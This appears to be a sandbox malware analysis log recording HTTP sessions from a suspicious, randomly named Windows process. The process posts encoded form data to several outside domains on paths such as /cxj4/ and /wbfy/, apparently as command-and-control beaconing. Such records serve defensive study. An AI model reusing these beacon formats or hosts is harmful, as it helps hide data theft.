                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.11.3049855136.243.64.147805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:10.206928015 CET2578OUTPOST /cxj4/ HTTP/1.1
                                                                                    Host: www.100millionjobs.africa
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.100millionjobs.africa
                                                                                    Referer: http://www.100millionjobs.africa/cxj4/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6b 6e 34 50 46 39 42 4b 6b 35 43 64 42 76 66 59 35 2b 6a 64 41 2b 38 77 48 75 71 4c 6c 2b 63 75 57 2b 4a 41 47 36 4c 31 64 65 39 32 4e 6f 79 37 55 58 65 2f 6f 7a 46 56 72 50 47 6a 7a 79 6c 73 7a 34 73 31 36 4d 48 6f 68 77 55 38 48 7a 56 37 49 37 45 32 35 46 2f 50 4c 4d 69 68 54 51 74 31 6c 76 32 43 35 7a 76 51 38 45 62 4d 4c 6b 79 63 6d 43 57 76 6b 63 49 79 2f 78 59 45 73 2f 57 48 54 76 46 66 46 7a 54 70 56 47 6f 49 71 4a 73 67 41 6c 6f 4c 63 4a 41 72 77 35 4d 54 65 68 6a 49 6c 50 2f 46 67 5a 77 4b 64 74 46 2f 48 49 37 33 6b 37 6a 76 7a 41 7a 54 65 52 62 33 30 69 64 54 58 6a 6c 52 58 36 65 55 35 56 46 39 79 4d 4f 61 5a 4d 5a 44 42 78 78 79 6f 75 78 6b 67 58 57 75 78 4c 70 4f 70 55 4e 57 48 41 33 68 44 64 35 4d 2b 6d 6b 66 5a 43 6b 56 6a 6d 2f 71 76 2f 65 37 30 79 55 58 31 50 6a 77 59 35 51 62 36 6f 65 65 4d 52 63 74 64 67 6a 6b 67 52 50 4e 73 4c 42 58 54 69 6e 30 69 36 62 42 64 61 34 47 48 55 4b 33 38 56 64 6b 6a 57 4d 56 6c 68 57 7a 63 34 6a [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=tIFi+WNsJjQFkn4PF9BKk5CdBvfY5+jdA+8wHuqLl+cuW+JAG6L1de92Noy7UXe/ozFVrPGjzylsz4s16MHohwU8HzV7I7E25F/PLMihTQt1lv2C5zvQ8EbMLkycmCWvkcIy/xYEs/WHTvFfFzTpVGoIqJsgAloLcJArw5MTehjIlP/FgZwKdtF/HI73k7jvzAzTeRb30idTXjlRX6eU5VF9yMOaZMZDBxxyouxkgXWuxLpOpUNWHA3hDd5M+mkfZCkVjm/qv/e70yUX1PjwY5Qb6oeeMRctdgjkgRPNsLBXTin0i6bBda4GHUK38VdkjWMVlhWzc4j/RfPUjQWuLjGcYUvjE7OK2eAA4+F0H9oWYDMg6l68D0PbWTHyo9AGkbBGdnFtERyRs5qwF8W7oB7FuhROJVLINc8Ohlro7Zn413CJLeyWiOmyS1eguaUTfibgirNCBcDDAsadFSQ6lUr0d8e5m+05qFQhUqV+IrrZJqW6360iyCjQjF/Zd5MuAcuPuptetB3VNKGX8d2LCD/3MEES0ttsaxCl9vwiJVXWhy3J01qIhmAvChByjlWCKXG0uMXltKfI/InDQgJf9e/K7+rcqAZp34tBm9HFRNfv5EEbL2SRnac0yA6MaXk183srji9jEyApmJ3/UesraOuYBn6w/2995CpGAUHQjs1WypkoKhLtWhvSmPn0pW6u9wnhJrCuqZ4eTrQqwmhQRx6i1Ec/fjz6tg5FZwd1PRW/h07bjuJCLhIUGtIYAkgY9Iro0gKLe9RgMoZSOtr/WgR6OOlg+/oax7+g8P1sG7dAHzUsg9o8nDdc0MyMJK537jeJdXJkSFKEFxbRtWWtoSNiBp1OFzpisqhOVLd7sHytpw4ILVPe0FP2QUKsp+2/NjKOL5itlntugnTSuNLHwgCs3nEHDZY+sEtdNkWs+QZutW84cqEHlscJz1CJnm/ncm0Js0KfL4ryQPfmKkKlinF97QeklovrEpUGThalzzWGh [TRUNCATED]
                                                                                    Jan 9, 2025 16:56:10.206948042 CET1385OUTData Raw: 61 66 55 45 41 58 42 45 62 75 46 2f 66 44 70 37 4a 43 43 61 52 59 46 30 2f 70 53 77 76 41 64 69 6e 77 78 34 43 4c 70 35 72 44 78 4b 59 75 68 33 67 43 72 4d 49 43 4c 33 45 64 43 77 50 68 46 4e 6e 4a 64 46 33 61 38 70 48 66 49 79 44 2b 7a 4b 76 46
                                                                                    Data Ascii: afUEAXBEbuF/fDp7JCCaRYF0/pSwvAdinwx4CLp5rDxKYuh3gCrMICL3EdCwPhFNnJdF3a8pHfIyD+zKvFXmCdPVRRDXpMcgSGokWiKHpm3f+SSTzqzTSfPAeRrxYswJxnfUUbwqWUHj9u+OWEtRpvWeLuGPOyEhCv/3Fq8yAbHV4l0nu40AFgJba4ajR2/PPOn6wJngjRIQnqEgEi3pxiONKSCy0cDp9k5o8sgi9jDqpvqRaMa
                                                                                    Jan 9, 2025 16:56:10.433511019 CET493INHTTP/1.1 302 Found
                                                                                    Date: Thu, 09 Jan 2025 15:56:10 GMT
                                                                                    Server: Apache
                                                                                    Location: http://maximumgroup.co.za/cxj4/
                                                                                    Content-Length: 290
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.11.3049856136.243.64.147805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:12.971327066 CET544OUTGET /cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqIJ6FVQVj1Nnq3yix8Cc= HTTP/1.1
                                                                                    Host: www.100millionjobs.africa
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:56:13.199781895 CET785INHTTP/1.1 302 Found
                                                                                    Date: Thu, 09 Jan 2025 15:56:13 GMT
                                                                                    Server: Apache
                                                                                    Location: http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqIJ6FVQVj1Nnq3yix8Cc=
                                                                                    Content-Length: 438
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 3f 38 30 6b 3d 6c 52 61 70 43 50 4d 58 67 44 6b 26 61 6d 70 3b 36 42 2d 6c 37 46 3d 67 4b 74 43 39 6d 70 4e 48 54 6b 54 72 30 30 4a 43 62 6c 72 6c 38 61 33 41 66 54 58 2f 64 75 6f 4d 38 45 62 58 4d 4b 4e 6a 65 59 6d 45 5a 74 63 47 61 6a 79 42 63 74 72 57 4f 36 6f 45 48 4f 6f 6f 67 46 54 6c 66 53 38 2b 44 4e 51 77 35 35 44 32 4d 66 43 71 41 68 6a 49 6a 4e 67 5a 36 6b 77 6b 48 4c 71 49 4a 36 46 56 51 56 6a 31 4e 6e 71 33 79 69 78 38 43 63 3d 22 3e 68 65 72 65 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&amp;6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqIJ6FVQVj1Nnq3yix8Cc=">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.11.3049857202.95.11.110805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:19.121620893 CET805OUTPOST /wbfy/ HTTP/1.1
                                                                                    Host: www.mirenzhibo.net
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mirenzhibo.net
                                                                                    Referer: http://www.mirenzhibo.net/wbfy/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 79 65 34 55 33 64 79 49 63 37 79 66 2f 77 66 34 2b 4f 76 31 6a 70 79 45 70 46 4d 6b 54 38 42 6b 66 55 72 52 4c 32 53 58 51 6f 74 78 56 30 4d 49 2b 4e 79 66 4e 53 68 73 32 49 4a 35 55 62 62 4a 54 2f 2b 63 64 70 77 76 6c 31 42 4e 65 7a 58 58 55 5a 6e 38 49 38 59 49 4e 42 53 78 46 67 66 50 39 38 48 4e 4a 79 75 30 30 6e 34 58 78 45 30 63 6e 55 4e 7a 31 6d 35 65 46 4f 63 65 76 6f 68 2b 71 38 59 42 48 31 6e 54 39 74 61 58 35 6f 56 49 70 75 37 59 51 44 4c 34 6c 34 38 4f 55 46 4f 43 5a 56 36 6e 33 6d 36 47 65 44 39 69 37 72 69 6c 50 56 49 7a 46 67 3d 3d
                                                                                    Data Ascii: 6B-l7F=ac270/Kc6bxJye4U3dyIc7yf/wf4+Ov1jpyEpFMkT8BkfUrRL2SXQotxV0MI+NyfNShs2IJ5UbbJT/+cdpwvl1BNezXXUZn8I8YINBSxFgfP98HNJyu00n4XxE0cnUNz1m5eFOcevoh+q8YBH1nT9taX5oVIpu7YQDL4l48OUFOCZV6n3m6GeD9i7rilPVIzFg==
                                                                                    Jan 9, 2025 16:56:19.465543985 CET190INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Thu, 09 Jan 2025 15:56:19 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d404 Not Found0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.11.3049858202.95.11.110805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:21.966253996 CET825OUTPOST /wbfy/ HTTP/1.1
                                                                                    Host: www.mirenzhibo.net
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mirenzhibo.net
                                                                                    Referer: http://www.mirenzhibo.net/wbfy/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 7a 2f 6f 55 77 4e 4f 49 61 62 79 65 77 51 66 34 6c 65 76 78 6a 70 2b 45 70 45 49 30 54 4b 70 6b 66 32 7a 52 4b 7a 79 58 54 6f 74 78 4e 45 4d 4e 39 39 79 45 4e 53 6c 6b 32 4a 31 35 55 62 50 4a 54 36 43 63 63 61 59 6f 6b 6c 42 54 66 44 58 56 61 35 6e 38 49 38 59 49 4e 42 58 71 46 67 48 50 39 4d 58 4e 49 51 47 31 72 58 34 59 32 45 30 63 78 6b 4d 36 31 6d 35 73 46 4d 70 4c 76 72 56 2b 71 38 49 42 47 67 62 53 7a 74 61 52 32 49 55 70 68 4e 69 4e 49 78 2f 4e 73 4b 6b 6c 62 6e 44 32 52 69 58 39 71 6c 4f 45 4e 6a 42 50 6e 71 50 4e 4e 58 4a 6f 59 6e 32 43 55 4d 70 74 45 32 47 4e 78 6f 68 4f 2f 39 51 49 4a 4d 41 3d
                                                                                    Data Ascii: 6B-l7F=ac270/Kc6bxJz/oUwNOIabyewQf4levxjp+EpEI0TKpkf2zRKzyXTotxNEMN99yENSlk2J15UbPJT6CccaYoklBTfDXVa5n8I8YINBXqFgHP9MXNIQG1rX4Y2E0cxkM61m5sFMpLvrV+q8IBGgbSztaR2IUphNiNIx/NsKklbnD2RiX9qlOENjBPnqPNNXJoYn2CUMptE2GNxohO/9QIJMA=
                                                                                    Jan 9, 2025 16:56:22.308672905 CET190INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Thu, 09 Jan 2025 15:56:22 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d404 Not Found0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.11.3049859202.95.11.110805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:24.805553913 CET1289OUTPOST /wbfy/ HTTP/1.1
                                                                                    Host: www.mirenzhibo.net
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mirenzhibo.net
                                                                                    Referer: http://www.mirenzhibo.net/wbfy/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 7a 2f 6f 55 77 4e 4f 49 61 62 79 65 77 51 66 34 6c 65 76 78 6a 70 2b 45 70 45 49 30 54 4b 52 6b 65 46 37 52 4b 53 79 58 53 6f 74 78 54 30 4d 4d 39 39 7a 65 4e 57 42 67 32 4a 34 4d 55 59 33 4a 63 38 32 63 56 4c 59 6f 39 56 42 54 61 7a 58 59 55 5a 6e 6c 49 38 49 4d 4e 42 6e 71 46 67 48 50 39 4b 72 4e 49 43 75 31 74 58 34 58 78 45 30 71 6e 55 4e 66 31 6c 4a 57 46 4d 73 77 76 75 4a 2b 71 50 67 42 48 53 7a 53 7a 74 61 52 30 34 55 6f 68 4e 65 4d 49 78 6d 45 73 4c 73 54 61 57 58 32 54 58 69 5a 39 55 79 34 65 6a 46 2b 76 2b 79 30 45 55 4e 38 57 46 69 42 64 38 46 79 43 55 71 69 32 4e 4e 4b 72 64 51 73 51 63 6b 48 6a 48 6b 6e 49 73 76 51 59 67 71 35 30 56 4a 54 78 67 39 4c 47 6e 7a 66 4f 79 4c 7a 39 67 39 35 71 30 6e 67 44 6e 70 63 37 6f 6b 7a 77 67 5a 53 35 50 55 66 64 48 2b 75 45 6e 63 76 44 68 69 2b 6f 78 52 44 41 32 77 34 34 63 30 2f 34 61 6c 79 57 6d 66 63 71 77 33 49 62 38 6a 38 44 54 39 77 2f 4e 30 7a 31 6d 78 50 75 49 64 73 64 37 36 79 54 51 66 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=ac270/Kc6bxJz/oUwNOIabyewQf4levxjp+EpEI0TKRkeF7RKSyXSotxT0MM99zeNWBg2J4MUY3Jc82cVLYo9VBTazXYUZnlI8IMNBnqFgHP9KrNICu1tX4XxE0qnUNf1lJWFMswvuJ+qPgBHSzSztaR04UohNeMIxmEsLsTaWX2TXiZ9Uy4ejF+v+y0EUN8WFiBd8FyCUqi2NNKrdQsQckHjHknIsvQYgq50VJTxg9LGnzfOyLz9g95q0ngDnpc7okzwgZS5PUfdH+uEncvDhi+oxRDA2w44c0/4alyWmfcqw3Ib8j8DT9w/N0z1mxPuIdsd76yTQfkfTK/HZo8pTrtZlAHfDTYMgvdxhIE2eNjjzQTHotUo3lCVvyO/nhjTK0hOyYORWMpaKZSmH747e7sO+AM8jgLruHUgvJ/0xMgtHkPSejPL0sQBEXnrIIOZXmSwdvPUBGZ6ccXgmn3tKywnT59SCjtxv2itU3arXJkAU6DE4r5ofixubIi0gmpaKyVBwCQnW6c3he5VXOqO2a8mtbITggD+5ZtqWfr4WA9cMoTuxf+wO0+ocRSnFY0zryWP/c/lG9pIgOXegmolIo45Tl8HVhVDlkdQvTTlEE0kKTzcBeQHRcM7A02TYojPx5JXUcUhoZp9hAQvGNFyDefKd8AuJWTjpX+h1G
                                                                                    Jan 9, 2025 16:56:24.805605888 CET2653OUTData Raw: 44 2b 32 39 62 43 39 49 44 41 70 41 41 54 6a 4b 62 71 7a 4d 65 32 71 41 4c 59 6c 62 50 66 4e 36 32 51 79 52 76 53 4b 46 58 7a 32 71 37 55 33 71 46 56 79 6d 31 46 34 75 66 61 76 38 71 36 46 48 78 41 45 38 51 6d 78 68 62 39 4d 2b 63 69 38 44 46 6d
                                                                                    Data Ascii: D+29bC9IDApAATjKbqzMe2qALYlbPfN62QyRvSKFXz2q7U3qFVym1F4ufav8q6FHxAE8Qmxhb9M+ci8DFmsf3RGl/VmUHxE1DQ9W6p+zCGDR4s8ynEb+WfbirM8yIpoE9Dhrw7B3Lk3+HEFbtSI/k3oBbIHvmM1hhevMOfzATHL+hvHImk64I5SHOMSS8FXRPPqBMN2B1lccvhwsUnh4ltwvcZQFBjF5qAfNGSggEwhybjp6e3/
                                                                                    Jan 9, 2025 16:56:25.147938013 CET190INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Thu, 09 Jan 2025 15:56:25 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d404 Not Found0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.11.3049860202.95.11.110805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:27.628243923 CET537OUTGET /wbfy/?6B-l7F=Xeeb3ImT6ZQQytgApKylbK7mnw/Uy82KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPSWgMjv1orXfOBS8k1A=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.mirenzhibo.net
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:56:28.133764982 CET995INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 09 Jan 2025 15:56:27 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Data Raw: 33 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 42 61 69 64 75 73 70 69 64 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 [TRUNCATED]
                                                                                    Data Ascii: 322<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="Baiduspider" content="noindex, nofollow"><title></title> <script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><body style="padding: 0;margin: 0;"><div><script rel="nofollow" src="http://www.zbywl.com/js.js"></script></div></body></html>0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.11.304986113.248.169.48805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:33.551520109 CET814OUTPOST /kgjj/ HTTP/1.1
                                                                                    Host: www.nextlevel.finance
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.nextlevel.finance
                                                                                    Referer: http://www.nextlevel.finance/kgjj/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 62 54 69 68 36 50 48 78 38 5a 66 73 51 56 64 68 6b 78 72 2f 70 34 31 73 64 6b 6e 59 37 42 78 2b 56 44 2f 51 37 64 62 76 39 39 72 30 6e 6e 33 5a 57 52 2f 51 59 48 47 64 66 71 69 38 2f 36 38 4c 74 33 38 30 35 7a 6d 48 39 77 70 66 68 59 32 7a 4f 6e 6d 59 77 2f 61 6a 66 4c 50 63 6f 2f 6e 41 38 4e 31 78 6f 4d 41 43 6a 79 5a 56 7a 50 46 75 4f 64 47 6e 6d 4f 77 2f 45 6a 6d 69 53 35 57 39 30 36 33 67 4d 31 36 41 68 4f 38 70 4d 30 2b 37 44 72 6f 48 41 7a 55 43 78 5a 51 68 76 4a 78 47 6a 39 55 52 65 42 30 30 76 45 45 2f 56 65 46 58 39 30 37 33 32 67 3d 3d
                                                                                    Data Ascii: 6B-l7F=r2nTWKLo591VbTih6PHx8ZfsQVdhkxr/p41sdknY7Bx+VD/Q7dbv99r0nn3ZWR/QYHGdfqi8/68Lt3805zmH9wpfhY2zOnmYw/ajfLPco/nA8N1xoMACjyZVzPFuOdGnmOw/EjmiS5W9063gM16AhO8pM0+7DroHAzUCxZQhvJxGj9UReB00vEE/VeFX90732g==
                                                                                    Jan 9, 2025 16:56:33.688316107 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.11.304986213.248.169.48805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
